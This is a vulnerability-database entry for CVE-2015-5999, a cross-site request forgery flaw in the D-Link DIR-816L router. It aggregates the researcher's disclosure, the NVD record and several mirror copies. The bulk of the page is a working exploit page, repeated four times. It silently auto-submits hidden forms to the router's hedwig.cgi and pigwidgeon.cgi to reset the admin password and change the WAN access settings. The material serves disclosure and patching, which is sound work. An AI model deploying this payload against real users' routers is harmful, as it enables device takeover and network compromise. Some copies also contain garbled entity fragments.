Search...

D-Link DIR-816L (Wireless Router) - Cross-Site Request Forgery (CVE-2015-5999)

2017-03-14T00:00:00

ID SSV:92774
Type seebug
Reporter Root
Modified 2017-03-14T00:00:00

Description

1) User login to DIR-816L wireless router

2) User visits the attacker's malicious web page (attacker.html)

3) attacker.html exploits CSRF vulnerability and changes the admin account password

PoC video link: http://youtu.be/UBdR2sUc8Wg

                                        
                                            
                                                Exploit code (attacker.html):
&lt;html&gt;
&lt;body&gt;
&lt;iframe style="display:none" name="hiddenpost"&gt;&lt;/iframe&gt;
&lt;form action="http://192.168.0.1/hedwig.cgi" method="POST" enctype="text/plain" target="hiddenpost" id="csrf"&gt;
&lt;input type="hidden" name="&lt;&#63;xml&#32;version" value=""1&#46;0"&#32;encoding&#61;"UTF&#45;8"&#63;&gt;&#10;&lt;postxml&gt;&#10;&lt;module&gt;&#10;&#9;&lt;service&gt;DEVICE&#46;ACCOUNT&lt;&#47;service&gt;&#10;&#9;&lt;device&gt;&#10;&#9;&#9;&lt;gw&#95;name&gt;DIR&#45;816L&lt;&#47;gw&#95;name&gt;&#10;&#9;&#9;&#10;&#9;&#9;&lt;account&gt;&#10;&#9;&#9;&#9;&lt;seqno&gt;1&lt;&#47;seqno&gt;&#10;&#9;&#9;&#9;&lt;max&gt;2&lt;&#47;max&gt;&#10;&#9;&#9;&#9;&lt;count&gt;1&lt;&#47;count&gt;&#10;&#9;&#9;&#9;&lt;entry&gt;&#10;&#9;&#9;&#9;&#9;&lt;uid&gt;USR&#45;&lt;&#47;uid&gt;&#10;&#9;&#9;&#9;&#9;&lt;name&gt;Admin&lt;&#47;name&gt;&#10;&#9;&#9;&#9;&#9;&lt;usrid&#47;&gt;&#10;&#9;&#9;&#9;&#9;&lt;password&gt;password&lt;&#47;password&gt;&#10;&#9;&#9;&#9;&#9;&lt;group&gt;0&lt;&#47;group&gt;&#10;&#9;&#9;&#9;&#9;&lt;description&#47;&gt;&#10;&#9;&#9;&#9;&lt;&#47;entry&gt;&#10;&#9;&#9;&lt;&#47;account&gt;&#10;&#9;&#9;&lt;group&gt;&#10;&#9;&#9;&#9;&lt;seqno&#47;&gt;&#10;&#9;&#9;&#9;&lt;max&#47;&gt;&#10;&#9;&#9;&#9;&lt;count&gt;0&lt;&#47;count&gt;&#10;&#9;&#9;&lt;&#47;group&gt;&#10;&#9;&#9;&lt;session&gt;&#10;&#9;&#9;&#9;&lt;captcha&gt;1&lt;&#47;captcha&gt;&#10;&#9;&#9;&#9;&lt;dummy&#47;&gt;&#10;&#9;&#9;&#9;&lt;timeout&gt;180&lt;&#47;timeout&gt;&#10;&#9;&#9;&#9;&lt;maxsession&gt;128&lt;&#47;maxsession&gt;&#10;&#9;&#9;&#9;&lt;maxauthorized&gt;16&lt;&#47;maxauthorized&gt;&#10;&#9;&#9;&lt;&#47;session&gt;&#10;&#9;&lt;&#47;device&gt;&#10;&lt;&#47;module&gt;&#10;&lt;module&gt;&#10;&#9;&lt;service&gt;HTTP&#46;WAN&#45;1&lt;&#47;service&gt;&#10;&#9;&lt;inf&gt;&#10;&#9;&#9;&lt;web&gt;&lt;&#47;web&gt;&#10;&#9;&#9;&lt;https&#95;rport&gt;&lt;&#47;https&#95;rport&gt;&#10;&#9;&#9;&lt;stunnel&gt;1&lt;&#47;stunnel&gt;&#10;&#9;&#9;&lt;weballow&gt;&#10;&#9;&#9;&#9;&lt;hostv4ip&#47;&gt;&#10;&#9;&#9;&lt;&#47;weballow&gt;&#10;&#9;&#9;&lt;inbfilter&#47;&gt;&#10;&#9;&lt;&#47;inf&gt;&#10;&#9;&#10;&lt;&#47;module&gt;&#10;&lt;module&gt;&#10;&#9;&lt;service&gt;HTTP&#46;WAN&#45;2&lt;&#47;service&gt;&#10;&#9;&lt;inf&gt;&#10;&#9;&#9;&lt;active&gt;0&lt;&#47;active&gt;&#10;&#9;&#9;&lt;nat&gt;NAT&#45;1&lt;&#47;nat&gt;&#10;&#9;&#9;&lt;web&#47;&gt;&#10;&#9;&#9;&lt;weballow&gt;&#10;&#9;&#9;&#9;&lt;hostv4ip&#47;&gt;&#10;&#9;&#9;&lt;&#47;weballow&gt;&#10;&#9;&lt;&#47;inf&gt;&#10;&#9;&#10;&lt;&#47;module&gt;&#10;&lt;module&gt;&#10;&#9;&lt;service&gt;INBFILTER&lt;&#47;service&gt;&#10;&#9;&lt;acl&gt;&#10;&#9;&#9;&lt;inbfilter&gt;&#9;&#9;&#10;&#9;&#9;&#9;&#9;&#9;&#9;&lt;seqno&gt;1&lt;&#47;seqno&gt;&#10;&#9;&#9;&#9;&lt;max&gt;24&lt;&#47;max&gt;&#10;&#9;&#9;&#9;&lt;count&gt;0&lt;&#47;count&gt;&#10;&#10;&#9;&#9;&lt;&#47;inbfilter&gt;&#9;&#9;&#10;&#9;&lt;&#47;acl&gt;&#10;&#9;&lt;ACTIVATE&gt;ignore&lt;&#47;ACTIVATE&gt;&#10;&lt;FATLADY&gt;ignore&lt;&#47;FATLADY&gt;&lt;SETCFG&gt;ignore&lt;&#47;SETCFG&gt;&lt;&#47;module&gt;&#10;&lt;module&gt;&#10;&#9;&lt;service&gt;SHAREPORT&lt;&#47;service&gt;&#10;&#9;&lt;FATLADY&gt;ignore&lt;&#47;FATLADY&gt;&#10;&#9;&#10;&lt;ACTIVATE&gt;ignore&lt;&#47;ACTIVATE&gt;&lt;&#47;module&gt;&#10;&lt;module&gt;&#10;&#9;&lt;service&gt;SAMBA&lt;&#47;service&gt;&#10;&#9;&lt;samba&gt;&#9;&#9;&#10;&#9;&#9;&#32;&#32;&#32;&#32;&#10;&#9;&#9;&lt;enable&gt;1&lt;&#47;enable&gt;&#10;&#9;&#9;&lt;auth&gt;1&lt;&#47;auth&gt;&#10;&#10;&#32;&#32;&#32;&#32;&lt;&#47;samba&gt;&#10;&lt;&#47;module&gt;&#10;&lt;&#47;postxml&gt;" /&gt;
&lt;/form&gt;
&lt;script&gt;alert("This is CSRF PoC");document.getElementById("csrf").submit()&lt;/script&gt;
&lt;iframe style="display:none" name="hiddencommit"&gt;&lt;/iframe&gt;
&lt;form action="http://192.168.0.1/pigwidgeon.cgi" method="POST" target="hiddencommit" id="csrf1"&gt;
&lt;input type="hidden" name="ACTIONS" value="SETCFG&#44;SAVE&#44;ACTIVATE" /&gt;
&lt;/form&gt;
&lt;script&gt;document.getElementById("csrf1").submit()&lt;/script&gt;
 
&lt;/body&gt;
&lt;/html&gt;

JSON Vulners Source

Initial Source

{"type": "seebug", "lastseen": "2017-11-19T12:01:07", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "href": "https://www.seebug.org/vuldb/ssvid-92774", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "history": [], "modified": "2017-03-14T00:00:00", "reporter": "Root", "description": "1) User login to DIR-816L wireless router\r\n\r\n2) User visits the attacker's malicious web page (attacker.html)\r\n\r\n3) attacker.html exploits CSRF vulnerability and changes the admin account password\r\n\r\nPoC video link: http://youtu.be/UBdR2sUc8Wg", "bulletinFamily": "exploit", "references": [], "objectVersion": "1.4", "viewCount": 1, "status": "cve,poc,details", "sourceHref": "https://www.seebug.org/vuldb/ssvid-92774", "cvelist": ["CVE-2015-5999"], "enchantments_done": [], "title": "D-Link DIR-816L (Wireless Router) - Cross-Site Request Forgery (CVE-2015-5999)", "id": "SSV:92774", "sourceData": "\n Exploit code (attacker.html):\r\n<html>\r\n<body>\r\n<iframe style=\"display:none\" name=\"hiddenpost\"></iframe>\r\n<form action=\"http://192.168.0.1/hedwig.cgi\" method=\"POST\" enctype=\"text/plain\" target=\"hiddenpost\" id=\"csrf\">\r\n<input type=\"hidden\" name=\"<?xml version\" value=\"\"1.0\" encoding=\"UTF-8\"?>
<postxml>
<module>
	<service>DEVICE.ACCOUNT</service>
	<device>
		<gw_name>DIR-816L</gw_name>
		
		<account>
			<seqno>1</seqno>
			<max>2</max>
			<count>1</count>
			<entry>
				<uid>USR-</uid>
				<name>Admin</name>
				<usrid/>
				<password>password</password>
				<group>0</group>
				<description/>
			</entry>
		</account>
		<group>
			<seqno/>
			<max/>
			<count>0</count>
		</group>
		<session>
			<captcha>1</captcha>
			<dummy/>
			<timeout>180</timeout>
			<maxsession>128</maxsession>
			<maxauthorized>16</maxauthorized>
		</session>
	</device>
</module>
<module>
	<service>HTTP.WAN-1</service>
	<inf>
		<web></web>
		<https_rport></https_rport>
		<stunnel>1</stunnel>
		<weballow>
			<hostv4ip/>
		</weballow>
		<inbfilter/>
	</inf>
	
</module>
<module>
	<service>HTTP.WAN-2</service>
	<inf>
		<active>0</active>
		<nat>NAT-1</nat>
		<web/>
		<weballow>
			<hostv4ip/>
		</weballow>
	</inf>
	
</module>
<module>
	<service>INBFILTER</service>
	<acl>
		<inbfilter>		
						<seqno>1</seqno>
			<max>24</max>
			<count>0</count>

		</inbfilter>		
	</acl>
	<ACTIVATE>ignore</ACTIVATE>
<FATLADY>ignore</FATLADY><SETCFG>ignore</SETCFG></module>
<module>
	<service>SHAREPORT</service>
	<FATLADY>ignore</FATLADY>
	
<ACTIVATE>ignore</ACTIVATE></module>
<module>
	<service>SAMBA</service>
	<samba>		
		    
		<enable>1</enable>
		<auth>1</auth>

    </samba>
</module>
</postxml>\" />\r\n</form>\r\n<script>alert(\"This is CSRF PoC\");document.getElementById(\"csrf\").submit()</script>\r\n<iframe style=\"display:none\" name=\"hiddencommit\"></iframe>\r\n<form action=\"http://192.168.0.1/pigwidgeon.cgi\" method=\"POST\" target=\"hiddencommit\" id=\"csrf1\">\r\n<input type=\"hidden\" name=\"ACTIONS\" value=\"SETCFG,SAVE,ACTIVATE\" />\r\n</form>\r\n<script>document.getElementById(\"csrf1\").submit()</script>\r\n \r\n</body>\r\n</html>\n ", "published": "2017-03-14T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 6.8}, "vulnersScore": 6.8}, "_object_type": "robots.models.seebug.SeebugBulletin"}

{"cve": [{"lastseen": "2018-10-10T11:05:52", "references": ["http://www.securityfocus.com/bid/77588", "http://packetstormsecurity.com/files/134379/D-Link-DIR-816L-Cross-Site-Request-Forgery.html", "https://www.exploit-db.com/exploits/38707/", "http://www.securityfocus.com/archive/1/536886/100/0/threaded", "ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-816L/DIR-816L_REVB_FIRMWARE_PATCH_NOTES_2.06.B09_BETA_EN.PDF", "http://seclists.org/fulldisclosure/2015/Nov/45"], "description": "Multiple cross-site request forgery (CSRF) vulnerabilities in the D-Link DIR-816L Wireless Router with firmware before 2.06.B09_BETA allow remote attackers to hijack the authentication of administrators for requests that (1) change the admin password, (2) change the network policy, or (3) possibly have other unspecified impact via crafted requests to hedwig.cgi and pigwidgeon.cgi.", "edition": 3, "reporter": "NVD", "published": "2015-11-18T11:59:02", "title": "CVE-2015-5999", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2015-5999"], "scanner": [], "modified": "2018-10-09T15:57:45", "cpe": ["cpe:/o:d-link:dir-816l_firmware:2.05.b02"], "id": "CVE-2015-5999", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5999", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:14:40", "references": [], "edition": 1, "description": "", "reporter": "Bhadresh Patel", "published": "2015-11-16T00:00:00", "type": "packetstorm", "title": "D-Link DIR-816L Cross Site Request Forgery", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2015-5999"], "modified": "2015-11-16T00:00:00", "href": "https://packetstormsecurity.com/files/134379/D-Link-DIR-816L-Cross-Site-Request-Forgery.html", "id": "PACKETSTORM:134379", "sourceData": "` \nTitle: \n==== \n \nD-link wireless router DIR-816L \u0096 Cross-Site Request Forgery (CSRF) vulnerability \n \nCredit: \n====== \n \nName: Bhadresh Patel \nCompany/affiliation: HelpAG \nWebsite: www.helpag.com \n \nCVE: \n===== \n \nCVE-2015-5999 \n \nDate: \n==== \n \n10-11-2015 (dd/mm/yyyy) \n \nVendor: \n====== \n \nD-Link is a computer networking company with relatively modest beginnings in Taiwan. The company has grown over the last 25 years into an exciting global brand offering the most up-to-date network solutions. Whether it is to suit the needs of the home consumer, a business or service provider, D-link take pride in offering award-winning networking products and services. \n \nProduct: \n======= \n \nDIR-816L is a wireless AC750 Dual Band Cloud Router \n \nProduct link: http://support.dlink.com/ProductInfo.aspx?m=DIR-816L \n \n \nAbstract: \n======= \n \nCross-Site Request Forgery (CSRF) vulnerability in the DIR-816L wireless router enables an attacker to perform an unwanted action on a wireless router for which the user/admin is currently authenticated. \n \nReport-Timeline: \n============ \n27-07-2015: Vendor notification \n27-07-2015: Vendor Response/Feedback \n05-11-2015: Vendor Fix/Patch \n10-11-2015: Public or Non-Public Disclosure \n \n \nAffected Version: \n============= \n \n<=2.06.B01 \n \nExploitation-Technique: \n=================== \n \nRemote \n \n \nSeverity Rating: \n=================== \n \n7.9 (AV:A/AC:M/Au:N/C:C/I:C/A:C) \n \n \nDetails: \n======= \n \nAn attacker who lures a DIR-816L authenticated user to browse a malicious website can exploit cross site request forgery (CSRF) to submit commands to DIR-816L wireless router and gain control of the product. The attacker could submit variety of commands including but not limited to changing the admin account password, changing the network policy, etc. \n \n \nProof Of Concept: \n================ \n \n1) User login to DIR-816L wireless router \n \n2) User visits the attacker's malicious web page (attacker.html) \n \n3) attacker.html exploits CSRF vulnerability and changes the admin account password \n \nPoC video link: http://youtu.be/UBdR2sUc8Wg \n \nExploit code (attacker.html): \n \n<html> \n<body> \n \n<iframe style=\"display:none\" name=\"hiddenpost\"></iframe> \n \n<form action=\"http://192.168.0.1/hedwig.cgi\" method=\"POST\" enctype=\"text/plain\" target=\"hiddenpost\" id=\"csrf\"> \n \n<input type=\"hidden\" name=\"<?xml version\" value=\"\"1.0\" encoding=\"UTF-8\"?> \n<postxml> \n<module> \n<service>DEVICE.ACCOUNT</service> \n<device> \n<gw_name>DIR-816L</gw_name> \n \n<account> \n<seqno>1</seqno> \n<max>2</max> \n<count>1</count> \n<entry> \n<uid>USR-</uid> \n<name>Admin</name> \n<usrid/> \n<password>password</password> \n<group>0</group> \n<description/> \n</entry> \n</account> \n<group> \n<seqno/> \n& \n#9;<max/> \n<count>0</count> \n</group> \n<session> \n<captcha>1</captcha> \n<dummy/> \n<timeout>180</timeout> \n<maxsession>128</maxsession> \n<maxauthorized>16</maxauthorized> \n</session> \n</device> \n</module> \n<module> \n<service>HTTP.WAN-1</service> \n<inf> \n<web></web> \n<https_rport></https_rport> \n<stunnel>1</stunnel> \n<weballow> \n<hostv4ip/> \n</weballow> \n<inbfilter/> \n</inf> \n \n</module> \n<module> \n<service>HTTP.WAN&#45 \n;2</service> \n<inf> \n<a! \nctive&gt \n;0</active> \n<nat>NAT-1</nat> \n<web/> \n<weballow> \n<hostv4ip/> \n</weballow> \n</inf> \n \n</module> \n<module> \n<service>INBFILTER</service> \n<acl> \n<inbfilter> \n<seqno>1</seqno> \n<max>24</max> \n<count>0</count> \n \n</inbfilter> \n</acl> \n<ACTIVATE>ignore</ACTIVATE> \n<FATLADY>ignore</FATLADY><SETCFG>ignore</SETCFG></module> \n<module> \n<service>SHAREPORT</service> \n<FATLADY>ignore</FATLADY> \n \n<ACTIVATE>ignore</ACTIVATE></module> \n<module> \n \n<service>SAMBA</service> \n<samba> \n \n<enable>1</enable> \n<auth>1</auth> \n \n</samba> \n</module> \n</postxml>\" /> \n \n</form> \n \n<script>alert(\"This is CSRF PoC\");document.getElementById(\"csrf\").submit()</script> \n \n<iframe style=\"display:none\" name=\"hiddencommit\"></iframe> \n \n<form action=\"http://192.168.0.1/pigwidgeon.cgi\" method=\"POST\" target=\"hiddencommit\" id=\"csrf1\"> \n \n<input type=\"hidden\" name=\"ACTIONS\" value=\"SETCFG,SAVE,ACTIVATE\" /> \n \n</form> \n<script>document.getElementById(\"csrf1\").submit()</script> \n \n</body> \n</html> \n \n \n \nPatched/Fixed Firmware and notes: \n========================== \n \n2.06.B09_BETA -- ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-816L/DIR-816L_REVB_FIRMWARE_PATCH_2.06.B09_BETA.ZIP \n \n2.06.B09_BETA -- ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-816L/DIR-816L_REVB_FIRMWARE_PATCH_NOTES_2.06.B09_BETA_EN.PDF \n \n \n \nCredits: \n======= \n \nBhadresh Patel \nSecurity Analyst \nHelpAG (www.helpag.com) \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/134379/DIR816L-xsrf.txt"}], "zdt": [{"lastseen": "2018-04-03T21:36:00", "references": [], "edition": 2, "description": "D-Link DIR-816L suffers from a cross site request forgery vulnerability.", "reporter": "Bhadresh Patel", "published": "2015-11-16T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "zdt", "title": "D-Link DIR-816L Cross Site Request Forgery Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-5999"], "modified": "2015-11-16T00:00:00", "id": "1337DAY-ID-24552", "href": "https://0day.today/exploit/description/24552", "sourceData": "Title:\r\n====\r\n\r\nD-link wireless router DIR-816L \u2013 Cross-Site Request Forgery (CSRF) vulnerability\r\n\r\nCredit:\r\n======\r\n\r\nName: Bhadresh Patel\r\nCompany/affiliation: HelpAG\r\nWebsite: www.helpag.com\r\n\r\nCVE:\r\n=====\r\n\r\nCVE-2015-5999\r\n\r\nDate:\r\n====\r\n\r\n10-11-2015 (dd/mm/yyyy)\r\n\r\nVendor:\r\n======\r\n\r\nD-Link is a computer networking company with relatively modest beginnings in Taiwan. The company has grown over the last 25 years into an exciting global brand offering the most up-to-date network solutions. Whether it is to suit the needs of the home consumer, a business or service provider, D-link take pride in offering award-winning networking products and services.\r\n\r\nProduct:\r\n=======\r\n\r\nDIR-816L is a wireless AC750 Dual Band Cloud Router\r\n\r\nProduct link: http://support.dlink.com/ProductInfo.aspx?m=DIR-816L\r\n\r\n\r\nAbstract:\r\n=======\r\n\r\nCross-Site Request Forgery (CSRF) vulnerability in the DIR-816L wireless router enables an attacker to perform an unwanted action on a wireless router for which the user/admin is currently authenticated.\r\n\r\nReport-Timeline:\r\n============\r\n27-07-2015: Vendor notification\r\n27-07-2015: Vendor Response/Feedback\r\n05-11-2015: Vendor Fix/Patch\r\n10-11-2015: Public or Non-Public Disclosure\r\n\r\n\r\nAffected Version:\r\n=============\r\n\r\n<=2.06.B01\r\n\r\nExploitation-Technique:\r\n===================\r\n\r\nRemote\r\n\r\n\r\nSeverity Rating:\r\n===================\r\n\r\n7.9 (AV:A/AC:M/Au:N/C:C/I:C/A:C)\r\n\r\n\r\nDetails:\r\n=======\r\n\r\nAn attacker who lures a DIR-816L authenticated user to browse a malicious website can exploit cross site request forgery (CSRF) to submit commands to DIR-816L wireless router and gain control of the product. The attacker could submit variety of commands including but not limited to changing the admin account password, changing the network policy, etc.\r\n\r\n\r\nProof Of Concept:\r\n================\r\n\r\n1) User login to DIR-816L wireless router\r\n\r\n2) User visits the attacker's malicious web page (attacker.html)\r\n\r\n3) attacker.html exploits CSRF vulnerability and changes the admin account password\r\n\r\nPoC video link: http://youtu.be/UBdR2sUc8Wg\r\n\r\nExploit code (attacker.html):\r\n\r\n<html>\r\n<body>\r\n\r\n<iframe style=\"display:none\" name=\"hiddenpost\"></iframe>\r\n\r\n<form action=\"http://192.168.0.1/hedwig.cgi\" method=\"POST\" enctype=\"text/plain\" target=\"hiddenpost\" id=\"csrf\">\r\n\r\n<input type=\"hidden\" name=\"<?xml version\" value=\"\"1.0\" encoding=\"UTF-8\"?>\r\n<postxml>\r\n<module>\r\n\t<service>DEVICE.ACCOUNT</service>\r\n\t<device>\r\n\t\t<gw_name>DIR-816L</gw_name>\r\n\t\t\r\n\t\t<account>\r\n\t\t\t<seqno>1</seqno>\r\n\t\t\t<max>2</max>\r\n\t\t\t<count>1</count>\r\n\t\t\t<entry>\r\n\t\t\t\t<uid>USR-</uid>\r\n\t\t\t\t<name>Admin</name>\r\n\t\t\t\t<usrid/>\r\n\t\t\t\t<password>password</password>\r\n\t\t\t\t<group>0</group>\r\n\t\t\t\t<description/>\r\n\t\t\t</entry>\r\n\t\t</account>\r\n\t\t<group>\r\n\t\t\t<seqno/>\r\n\t\t&\r\n #9;<max/>\r\n\t\t\t<count>0</count>\r\n\t\t</group>\r\n\t\t<session>\r\n\t\t\t<captcha>1</captcha>\r\n\t\t\t<dummy/>\r\n\t\t\t<timeout>180</timeout>\r\n\t\t\t<maxsession>128</maxsession>\r\n\t\t\t<maxauthorized>16</maxauthorized>\r\n\t\t</session>\r\n\t</device>\r\n</module>\r\n<module>\r\n\t<service>HTTP.WAN-1</service>\r\n\t<inf>\r\n\t\t<web></web>\r\n\t\t<https_rport></https_rport>\r\n\t\t<stunnel>1</stunnel>\r\n\t\t<weballow>\r\n\t\t\t<hostv4ip/>\r\n\t\t</weballow>\r\n\t\t<inbfilter/>\r\n\t</inf>\r\n\t\r\n</module>\r\n<module>\r\n\t<service>HTTP.WAN&#45\r\n ;2</service>\r\n\t<inf>\r\n\t\t<a!\r\n ctive&gt\r\n;0</active>\r\n\t\t<nat>NAT-1</nat>\r\n\t\t<web/>\r\n\t\t<weballow>\r\n\t\t\t<hostv4ip/>\r\n\t\t</weballow>\r\n\t</inf>\r\n\t\r\n</module>\r\n<module>\r\n\t<service>INBFILTER</service>\r\n\t<acl>\r\n\t\t<inbfilter>\t\t\r\n\t\t\t\t\t\t<seqno>1</seqno>\r\n\t\t\t<max>24</max>\r\n\t\t\t<count>0</count>\r\n\r\n\t\t</inbfilter>\t\t\r\n\t</acl>\r\n\t<ACTIVATE>ignore</ACTIVATE>\r\n<FATLADY>ignore</FATLADY><SETCFG>ignore</SETCFG></module>\r\n<module>\r\n\t<service>SHAREPORT</service>\r\n\t<FATLADY>ignore</FATLADY>\r\n\t\r\n<ACTIVATE>ignore</ACTIVATE></module>\r\n<module>\r\n \r\n\t<service>SAMBA</service>\r\n\t<samba>\t\t\r\n\t\t \r\n\t\t<enable>1</enable>\r\n\t\t<auth>1</auth>\r\n\r\n </samba>\r\n</module>\r\n</postxml>\" />\r\n\r\n</form>\r\n\r\n<script>alert(\"This is CSRF PoC\");document.getElementById(\"csrf\").submit()</script>\r\n\r\n<iframe style=\"display:none\" name=\"hiddencommit\"></iframe>\r\n\r\n<form action=\"http://192.168.0.1/pigwidgeon.cgi\" method=\"POST\" target=\"hiddencommit\" id=\"csrf1\">\r\n\r\n<input type=\"hidden\" name=\"ACTIONS\" value=\"SETCFG,SAVE,ACTIVATE\" />\r\n\r\n</form>\r\n<script>document.getElementById(\"csrf1\").submit()</script>\r\n\r\n</body>\r\n</html>\r\n\r\n\r\n\r\nPatched/Fixed Firmware and notes:\r\n==========================\r\n\r\n2.06.B09_BETA -- ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-816L/DIR-816L_REVB_FIRMWARE_PATCH_2.06.B09_BETA.ZIP\r\n\r\n2.06.B09_BETA -- ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-816L/DIR-816L_REVB_FIRMWARE_PATCH_NOTES_2.06.B09_BETA_EN.PDF\n\n# 0day.today [2018-04-03] #", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/24552"}], "exploitdb": [{"lastseen": "2016-02-04T08:41:15", "osvdbidlist": ["130252"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "D-link Wireless Router DIR-816L \u2013 CSRF Vulnerability. CVE-2015-5999. Webapps exploit for hardware platform", "reporter": "Bhadresh Patel", "published": "2015-11-16T00:00:00", "type": "exploitdb", "title": "D-link Wireless Router DIR-816L \u2013 CSRF Vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2015-5999"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2015-11-16T00:00:00", "id": "EDB-ID:38707", "href": "https://www.exploit-db.com/exploits/38707/", "sourceData": "----------------------------------------------------------------------------------------------\r\n\r\nTitle:\r\n====\r\n\r\nD-link wireless router DIR-816L \u00e2\u20ac\u201c Cross-Site Request Forgery (CSRF) vulnerability\r\n\r\nCredit:\r\n======\r\n\r\nName: Bhadresh Patel\r\nCompany/affiliation: HelpAG\r\nWebsite: www.helpag.com\r\n\r\nCVE:\r\n=====\r\nCVE-2015-5999\r\n\r\nDate:\r\n====\r\n\r\n10-11-2015 (dd/mm/yyyy)\r\n\r\nVendor:\r\n======\r\nD-Link is a computer networking company with relatively modest beginnings in Taiwan. The company has grown over the last 25 years into an exciting global brand offering the most up-to-date network solutions. Whether it is to suit the needs of the home consumer, a business or service provider, D-link take pride in offering award-winning networking products and services.\r\n\r\nProduct:\r\n=======\r\nDIR-816L is a wireless AC750 Dual Band Cloud Router\r\n\r\nProduct link: http://support.dlink.com/ProductInfo.aspx?m=DIR-816L\r\n\r\n\r\nAbstract:\r\n=======\r\n\r\nCross-Site Request Forgery (CSRF) vulnerability in the DIR-816L wireless router enables an attacker to perform an unwanted action on a wireless router for which the user/admin is currently authenticated.\r\n\r\nReport-Timeline:\r\n============\r\n27-07-2015: Vendor notification\r\n27-07-2015: Vendor Response/Feedback\r\n05-11-2015: Vendor Fix/Patch\r\n10-11-2015: Public or Non-Public Disclosure\r\nAffected Version:\r\n=============\r\n<=2.06.B01\r\n\r\nExploitation-Technique:\r\n===================\r\nRemote\r\n\r\nSeverity Rating:\r\n===================\r\n\r\n7.9 (AV:A/AC:M/Au:N/C:C/I:C/A:C)\r\nDetails:\r\n=======\r\nAn attacker who lures a DIR-816L authenticated user to browse a malicious website can exploit cross site request forgery (CSRF) to submit commands to DIR-816L wireless router and gain control of the product. The attacker could submit variety of commands including but not limited to changing the admin account password, changing the network policy, etc.\r\n\r\n\r\nProof Of Concept:\r\n================\r\n\r\n1) User login to DIR-816L wireless router\r\n2) User visits the attacker's malicious web page (attacker.html)\r\n3) attacker.html exploits CSRF vulnerability and changes the admin account password\r\nPoC video link: http://youtu.be/UBdR2sUc8Wg\r\nExploit code (attacker.html):\r\n<html>\r\n<body>\r\n<iframe style=\"display:none\" name=\"hiddenpost\"></iframe>\r\n<form action=\"http://192.168.0.1/hedwig.cgi\" method=\"POST\" enctype=\"text/plain\" target=\"hiddenpost\" id=\"csrf\">\r\n<input type=\"hidden\" name=\"<?xml version\" value=\"\"1.0\" encoding=\"UTF-8\"?>
<postxml>
<module>
	<service>DEVICE.ACCOUNT</service>
	<device>
		<gw_name>DIR-816L</gw_name>
		
		<account>
			<seqno>1</seqno>
			<max>2</max>
			<count>1</count>
			<entry>
				<uid>USR-</uid>
				<name>Admin</name>
				<usrid/>
				<password>password</password>
				<group>0</group>
				<description/>
			</entry>
		</account>
		<group>
			<seqno/>
			<max/>
			<count>0</count>
		</group>
		<session>
			<captcha>1</captcha>
			<dummy/>
			<timeout>180</timeout>
			<maxsession>128</maxsession>
			<maxauthorized>16</maxauthorized>
		</session>
	</device>
</module>
<module>
	<service>HTTP.WAN-1</service>
	<inf>
		<web></web>
		<https_rport></https_rport>
		<stunnel>1</stunnel>
		<weballow>
			<hostv4ip/>
		</weballow>
		<inbfilter/>
	</inf>
	
</module>
<module>
	<service>HTTP.WAN-2</service>
	<inf>
		<active>0</active>
		<nat>NAT-1</nat>
		<web/>
		<weballow>
			<hostv4ip/>
		</weballow>
	</inf>
	
</module>
<module>
	<service>INBFILTER</service>
	<acl>
		<inbfilter>		
						<seqno>1</seqno>
			<max>24</max>
			<count>0</count>

		</inbfilter>		
	</acl>
	<ACTIVATE>ignore</ACTIVATE>
<FATLADY>ignore</FATLADY><SETCFG>ignore</SETCFG></module>
<module>
	<service>SHAREPORT</service>
	<FATLADY>ignore</FATLADY>
	
<ACTIVATE>ignore</ACTIVATE></module>
<module>
	<service>SAMBA</service>
	<samba>		
		    
		<enable>1</enable>
		<auth>1</auth>

    </samba>
</module>
</postxml>\" />\r\n</form>\r\n<script>alert(\"This is CSRF PoC\");document.getElementById(\"csrf\").submit()</script>\r\n<iframe style=\"display:none\" name=\"hiddencommit\"></iframe>\r\n<form action=\"http://192.168.0.1/pigwidgeon.cgi\" method=\"POST\" target=\"hiddencommit\" id=\"csrf1\">\r\n<input type=\"hidden\" name=\"ACTIONS\" value=\"SETCFG,SAVE,ACTIVATE\" />\r\n</form>\r\n<script>document.getElementById(\"csrf1\").submit()</script>\r\n\r\n</body>\r\n</html>\r\nPatched/Fixed Firmware and notes:\r\n==========================\r\n2.06.B09_BETA -- ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-816L/DIR-816L_REVB_FIRMWARE_PATCH_2.06.B09_BETA.ZIP\r\n2.06.B09_BETA -- ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-816L/DIR-816L_REVB_FIRMWARE_PATCH_NOTES_2.06.B09_BETA_EN.PDF\r\n\r\nCredits:\r\n=======\r\nBhadresh Patel\r\nSenior Security Analyst\r\nHelpAG 